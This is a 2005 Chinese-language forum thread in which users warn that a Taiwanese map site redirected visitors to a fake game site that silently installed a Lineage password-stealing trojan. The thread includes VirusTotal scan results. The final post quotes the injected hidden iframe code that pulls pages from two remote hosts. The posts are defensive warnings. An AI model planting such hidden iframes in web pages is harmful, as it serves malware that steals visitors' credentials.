darren2000
2005-04-03, 12:33 AM
hxxt://www.map.com.tw
不知道從哪連到大陸假的gamebase.org.cn
然後利用漏洞下載安裝不明程式
而且沒一家掃的出來
已經回報給kav看看了
有去過的小心了
贊助商連結
不知道從哪連到大陸假的gamebase.org.cn
然後利用漏洞下載安裝不明程式
而且沒一家掃的出來
已經回報給kav看看了
有去過的小心了
贊助商連結
|
贊助商連結 頁 :
[1]
2
darren2000 2005-04-03, 12:33 AM hxxt://www.map.com.tw 不知道從哪連到大陸假的gamebase.org.cn 然後利用漏洞下載安裝不明程式 而且沒一家掃的出來 已經回報給kav看看了 有去過的小心了 贊助商連結 alec5106 2005-04-03, 01:47 AM 這是真的?假的?? mizuiro 2005-04-03, 02:40 AM 通常這類的入侵..都是在種"天堂"的木馬.. 剛剛看了一下..卡巴斯基已經可以掃出來了 Trojan-PSW.Win32.Lineage.cb 果然...還是「天堂」木馬.... :mad: 看樣子大陸仔的駭客靠這個測了不少錢 = = 下面是我把他那個有問題的.chm檔傳去 virustotal 掃的結果... Antivirus Version Update Result AntiVir 6.30.0.7 04.01.2005 no virus found AVG 718 04.01.2005 no virus found BitDefender 7.0 04.02.2005 no virus found ClamAV devel-20050307 04.02.2005 no virus found DrWeb 4.32b 04.02.2005 no virus found eTrust-Iris 7.1.194.0 04.02.2005 no virus found eTrust-Vet 11.7.0.0 04.01.2005 no virus found Fortinet 2.51 04.02.2005 no virus found F-Prot 3.16a 03.31.2005 no virus found Ikarus 2.32 04.01.2005 no virus found Kaspersky 4.0.2.24 04.02.2005 Trojan-PSW.Win32.Lineage.cb McAfee 4460 04.01.2005 no virus found NOD32v2 1.1044 04.02.2005 no virus found Norman 5.70.10 03.31.2005 no virus found Panda 8.02.00 04.02.2005 no virus found Sybari 7.5.1314 04.02.2005 no virus found Symantec 8.0 04.02.2005 no virus found ------------------------------------------------------------------------- www.virustotal.com :: @ Hispasec Sistemas 2004 :: e-mail [email protected] darren2000 2005-04-03, 01:59 PM 我把防毒關掉去試試看 發現電腦可疑檔案KAV掃不到 我想應該是病毒 或許可能認錯... alec5106 2005-04-03, 08:58 PM 果然, F-secure 也可以掃到 每次出門都會上這個網站參考一下,真要小心一下了 kaspersky 2005-04-03, 09:46 PM 我剛剛把那個 rar 檔傳到 VirusTotal 可是都是顯示 novirus 是不是檔案有問題 ?? darren2000 2005-04-03, 10:17 PM 我剛剛把那個 rar 檔傳到 VirusTotal 可是都是顯示 novirus 是不是檔案有問題 ?? 我後來在進去遇到的是trojanlineage.cb 但是我第一次進去後 發現temporary資料夾多出icyfox.exe 似乎檔名跟以前lineage的病毒檔名差不多 而且程序中馬上多出不明程序inertinfo lineage.cb傳到 VirusTotal也沒幾家可以掃到 這次如果是新變種的話...可能更少可以察覺到了... 我覺的是木馬機會蠻大的...也可能是我太過緊張了 :eek: kaspersky 2005-04-04, 01:05 AM 依照您這樣的敘述 應該是木馬沒有錯 只是先和您確認 您現在放上來的這個檔案 是不是就是您第一次傳給 virustotal 以及 kav 的同一個檔案 ? darren2000 2005-04-04, 08:58 AM 依照您這樣的敘述 應該是木馬沒有錯 只是先和您確認 您現在放上來的這個檔案 是不是就是您第一次傳給 virustotal 以及 kav 的同一個檔案 ? 嗯嗯 沒錯 傳給KAV的裡面其中一個檔案我沒放上來..因為應該是正常的系統檔案 yuping 2005-04-04, 10:39 AM 壓縮檔一直掃不到病毒但是看原始檔應該是這行有問題,Mcafee可以抓到.. <iframe width=0 height=0 src="http://www.xx158.com/tian/icyfox.htm"><iframe src="http://hc898.xm18.china-host.net/2005/" width="0" height="0"></iframe> |
|
|